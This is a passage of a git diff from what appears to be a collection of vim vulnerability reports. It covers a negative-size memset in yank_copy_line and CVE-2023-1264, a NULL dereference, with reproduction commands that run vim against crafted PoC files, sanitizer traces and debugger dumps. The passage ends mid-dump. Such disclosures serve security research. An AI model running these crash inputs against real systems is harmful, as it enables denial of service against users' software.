-    #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
-    #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
-    #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
-    #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
-    #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
-    #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
-    #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
-    #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
-    #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
-    #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
-    #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
-    #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
-    #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
-    #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
-    #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
-    #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
-    #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
-    #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
-    #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
-    #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d)
-
-0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272)
-allocated by thread T0 here:
-    #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
-    #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246
-    #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151
-    #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464
-    #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
-    #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
-    #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
-    #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
-    #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
-    #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
-    #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
-    #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
-    #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
-    #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
-    #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
-    #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
-    #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
-    #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
-    #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
-    #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
-    #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
-    #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
-    #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
-    #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
-    #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
-
-SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
-==1962298==ABORTING
-```
-[poc_nsp01_s.dat](poc_nsp01_s.dat)
-## GDB
-```bash
-gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
-
-─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[Thread debugging using libthread_db enabled]
-Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
-
-Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468
-1468        vim_memset(pnew, ' ', (size_t)bd->startspaces);
-─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- 0x00005555562c5854  yank_copy_line+883 je     0x5555562c585e <yank_copy_line+893>
- 0x00005555562c5856  yank_copy_line+885 mov    %rdx,%rdi
- 0x00005555562c5859  yank_copy_line+888 callq  0x555555696b30 <__asan_report_store8@plt>
- 0x00005555562c585e  yank_copy_line+893 mov    -0x18(%rbp),%rdx
- 0x00005555562c5862  yank_copy_line+897 mov    %rdx,(%rax)
-!0x00005555562c5865  yank_copy_line+900 mov    -0x28(%rbp),%rax
- 0x00005555562c5869  yank_copy_line+904 mov    %rax,%rdx
- 0x00005555562c586c  yank_copy_line+907 mov    %rdx,%rax
- 0x00005555562c586f  yank_copy_line+910 shr    $0x3,%rax
- 0x00005555562c5873  yank_copy_line+914 add    $0x7fff8000,%rax
-─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time
-─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-     rax 0x0000602000007230        rbx 0x0000555556d935e0     rcx 0x0000000000000000     rdx 0x0000602000007250     rsi 0x0000000000000000     rdi 0x0000000000000000     rbp 0x00007fffffffbb00     rsp 0x00007fffffffbac0
-      r8 0x00007ffff7fb8000         r9 0x0000000000000002     r10 0x0000602000007240     r11 0x00000000000000e0     r12 0x00007fffffffbd30     r13 0x00000ffffffff772     r14 0x00007fffffffbb90     r15 0x0000555556d86b60
-     rip 0x00005555562c5865     eflags [ PF ZF IF ]            cs 0x00000033              ss 0x0000002b              ds 0x00000000              es 0x00000000              fs 0x00000000              gs 0x00000000        
-─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- 1463      bd->endspaces = 0;
- 1464      if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1))
- 1465                                        == NULL)
- 1466      return FAIL;
- 1467      y_current->y_array[y_idx] = pnew;
-!1468      vim_memset(pnew, ' ', (size_t)bd->startspaces);
- 1469      pnew += bd->startspaces;
- 1470      mch_memmove(pnew, bd->textstart, (size_t)bd->textlen);
- 1471      pnew += bd->textlen;
- 1472      vim_memset(pnew, ' ', (size_t)bd->endspaces);
-─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468
-[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290
-[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742
-[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754
-[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123
-[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960
-[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887
-[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850
-[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768
-[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580
-[+]
-─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468
-─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0
-loc pnew = 0x602000007250 "\276\276": 190 '\276'
-───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
->>> p bd->startspaces
-$2 = -1
->>> 
-```
-## Impact
-This vulnerability is capable of crashing software, modify memory, and possible remote execution.
+## Description
+Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
+## vim version
+```bash
+git log
+commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
+```
+## POC
+```bash
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
+=================================================================
+==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
+    #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
+    #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
+    #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+    #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+    #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+    #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+    #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+    #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+    #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+    #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+    #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+    #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+    #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+    #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+    #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+    #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+    #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+    #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
+    #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
+    #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d)
+
+0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272)
+allocated by thread T0 here:
+    #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
+    #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246
+    #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151
+    #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464
+    #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+    #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+    #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+    #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+    #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+    #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+    #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+    #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+    #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+    #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+    #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+    #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+    #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+    #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+    #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+    #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
+    #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
+
+SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
+==1962298==ABORTING
+```
+[poc_nsp01_s.dat](poc_nsp01_s.dat)
+## GDB
+```bash
+gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
+
+─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468
+1468        vim_memset(pnew, ' ', (size_t)bd->startspaces);
+─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 0x00005555562c5854  yank_copy_line+883 je     0x5555562c585e <yank_copy_line+893>
+ 0x00005555562c5856  yank_copy_line+885 mov    %rdx,%rdi
+ 0x00005555562c5859  yank_copy_line+888 callq  0x555555696b30 <__asan_report_store8@plt>
+ 0x00005555562c585e  yank_copy_line+893 mov    -0x18(%rbp),%rdx
+ 0x00005555562c5862  yank_copy_line+897 mov    %rdx,(%rax)
+!0x00005555562c5865  yank_copy_line+900 mov    -0x28(%rbp),%rax
+ 0x00005555562c5869  yank_copy_line+904 mov    %rax,%rdx
+ 0x00005555562c586c  yank_copy_line+907 mov    %rdx,%rax
+ 0x00005555562c586f  yank_copy_line+910 shr    $0x3,%rax
+ 0x00005555562c5873  yank_copy_line+914 add    $0x7fff8000,%rax
+─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time
+─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+     rax 0x0000602000007230        rbx 0x0000555556d935e0     rcx 0x0000000000000000     rdx 0x0000602000007250     rsi 0x0000000000000000     rdi 0x0000000000000000     rbp 0x00007fffffffbb00     rsp 0x00007fffffffbac0
+      r8 0x00007ffff7fb8000         r9 0x0000000000000002     r10 0x0000602000007240     r11 0x00000000000000e0     r12 0x00007fffffffbd30     r13 0x00000ffffffff772     r14 0x00007fffffffbb90     r15 0x0000555556d86b60
+     rip 0x00005555562c5865     eflags [ PF ZF IF ]            cs 0x00000033              ss 0x0000002b              ds 0x00000000              es 0x00000000              fs 0x00000000              gs 0x00000000        
+─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 1463      bd->endspaces = 0;
+ 1464      if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1))
+ 1465                                        == NULL)
+ 1466      return FAIL;
+ 1467      y_current->y_array[y_idx] = pnew;
+!1468      vim_memset(pnew, ' ', (size_t)bd->startspaces);
+ 1469      pnew += bd->startspaces;
+ 1470      mch_memmove(pnew, bd->textstart, (size_t)bd->textlen);
+ 1471      pnew += bd->textlen;
+ 1472      vim_memset(pnew, ' ', (size_t)bd->endspaces);
+─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468
+[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290
+[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742
+[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754
+[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123
+[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960
+[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887
+[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850
+[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768
+[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580
+[+]
+─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468
+─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0
+loc pnew = 0x602000007250 "\276\276": 190 '\276'
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+>>> p bd->startspaces
+$2 = -1
+>>> 
+```
+## Impact
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-1264/README.md b/cve/vim/2023/CVE-2023-1264/README.md
index df7b85a6..418a9873 100644
--- a/cve/vim/2023/CVE-2023-1264/README.md
+++ b/cve/vim/2023/CVE-2023-1264/README.md
@@ -1,108 +1,108 @@
-# CVE-2023-1264
-
-NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input.
-
-## vim version
-
-```
-commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD)
-Author: Yegappan Lakshmanan <yegappan@yahoo.com>
-Date:   Thu Feb 9 12:23:17 2023 +0000
-
-    patch 9.0.1293: the set_num_option() is too long
-
-    Problem:    The set_num_option() is too long.
-    Solution:   Move code to separate functions. (Yegappan Lakshmanan,
-                closes #11954)
-```
-
-## Proof of Concept
-
-```
-➜  src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa!
-[1]    29650 segmentation fault  ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa!
-```
-
-## Debug info
-
-```
-pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa!
-Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa!
-[Thread debugging using libthread_db enabled]
-Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
-
-Program received signal SIGSEGV, Segmentation fault.
-0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145
-2145        int     b0 = *p;
-LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
-──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────────────────────────
- RAX  0x0
-*RBX  0x55555595ad70 ◂— 0x5
- RCX  0x0
- RDX  0x0
- RDI  0x0
-*RSI  0x1
-*R8   0x20f5d46a556c2
-*R9   0x7fffffffb314 ◂— 0x5587847b00007fff
-*R10  0x7fffffffb340 ◂— 0x63e4e959
- R11  0x0
-*R12  0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim'
-*R13  0x5555558878e6 (main) ◂— endbr64
-*R14  0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64
-*R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
-*RBP  0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ...
-*RSP  0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ...
-*RIP  0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax]
-───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────────────────────────────────────────
- ► 0x555555699519 <utfc_ptr2len+20>    movzx  eax, byte ptr [rax]
-   0x55555569951c <utfc_ptr2len+23>    movzx  eax, al
-   0x55555569951f <utfc_ptr2len+26>    mov    dword ptr [rbp - 4], eax
-   0x555555699522 <utfc_ptr2len+29>    cmp    dword ptr [rbp - 4], 0
-   0x555555699526 <utfc_ptr2len+33>    jne    utfc_ptr2len+45                <utfc_ptr2len+45>
-    ↓
-   0x555555699532 <utfc_ptr2len+45>    cmp    dword ptr [rbp - 4], 0x7f
-   0x555555699536 <utfc_ptr2len+49>    jg     utfc_ptr2len+76                <utfc_ptr2len+76>
-    ↓
-   0x555555699551 <utfc_ptr2len+76>    mov    rax, qword ptr [rbp - 0x18]
-   0x555555699555 <utfc_ptr2len+80>    mov    rdi, rax
-   0x555555699558 <utfc_ptr2len+83>    call   utf_ptr2len                <utf_ptr2len>
-
-   0x55555569955d <utfc_ptr2len+88>    mov    dword ptr [rbp - 0xc], eax
-─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-In file: /root/test/vim/src/mbyte.c
-   2140  */
-   2141     int
-   2142 utfc_ptr2len(char_u *p)
-   2143 {
-   2144     int                len;
- ► 2145     int                b0 = *p;
-   2146 #ifdef FEAT_ARABIC
-   2147     int                prevlen;
-   2148 #endif
-   2149
-   2150     if (b0 == NUL)
-─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ...
-01:0008│     0x7fffffffb458 ◂— 0x0
-02:0010│     0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ...
-03:0018│     0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4]
-04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ...
-05:0028│     0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax
-06:0030│     0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ...
-07:0038│     0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752
-───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- ► f 0   0x555555699519 utfc_ptr2len+20
-   f 1   0x555555638d0c unputcmdline+101
-   f 2   0x55555565e74b vgetorpeek+3187
-   f 3   0x55555565b8a6 vgetc+250
-   f 4   0x55555565bf9e safe_vgetc+17
-   f 5   0x5555556aec0f get_number+126
-   f 6   0x5555556aedd7 prompt_for_number+115
-   f 7   0x55555578f2b8 spell_suggest+2101
-```
-
-[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat)
-
-## Impact
-
+# CVE-2023-1264
+
+NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input.
+
+## vim version
+
+```
+commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD)
+Author: Yegappan Lakshmanan <yegappan@yahoo.com>
+Date:   Thu Feb 9 12:23:17 2023 +0000
+
+    patch 9.0.1293: the set_num_option() is too long
+
+    Problem:    The set_num_option() is too long.
+    Solution:   Move code to separate functions. (Yegappan Lakshmanan,
+                closes #11954)
+```
+
+## Proof of Concept
+
+```
+➜  src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa!
+[1]    29650 segmentation fault  ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa!
+```
+
+## Debug info
+
+```
+pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa!
+Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa!
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145
+2145        int     b0 = *p;
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────────────────────────
+ RAX  0x0
+*RBX  0x55555595ad70 ◂— 0x5
+ RCX  0x0
+ RDX  0x0
+ RDI  0x0
+*RSI  0x1
+*R8   0x20f5d46a556c2
+*R9   0x7fffffffb314 ◂— 0x5587847b00007fff
+*R10  0x7fffffffb340 ◂— 0x63e4e959
+ R11  0x0
+*R12  0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim'
+*R13  0x5555558878e6 (main) ◂— endbr64
+*R14  0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64
+*R15  0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
+*RBP  0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ...
+*RSP  0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ...
+*RIP  0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax]
+───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────────────────────────────────────────
+ ► 0x555555699519 <utfc_ptr2len+20>    movzx  eax, byte ptr [rax]
+   0x55555569951c <utfc_ptr2len+23>    movzx  eax, al
+   0x55555569951f <utfc_ptr2len+26>    mov    dword ptr [rbp - 4], eax
+   0x555555699522 <utfc_ptr2len+29>    cmp    dword ptr [rbp - 4], 0
+   0x555555699526 <utfc_ptr2len+33>    jne    utfc_ptr2len+45                <utfc_ptr2len+45>
+    ↓
+   0x555555699532 <utfc_ptr2len+45>    cmp    dword ptr [rbp - 4], 0x7f
+   0x555555699536 <utfc_ptr2len+49>    jg     utfc_ptr2len+76                <utfc_ptr2len+76>
+    ↓
+   0x555555699551 <utfc_ptr2len+76>    mov    rax, qword ptr [rbp - 0x18]
+   0x555555699555 <utfc_ptr2len+80>    mov    rdi, rax
+   0x555555699558 <utfc_ptr2len+83>    call   utf_ptr2len                <utf_ptr2len>
+
+   0x55555569955d <utfc_ptr2len+88>    mov    dword ptr [rbp - 0xc], eax
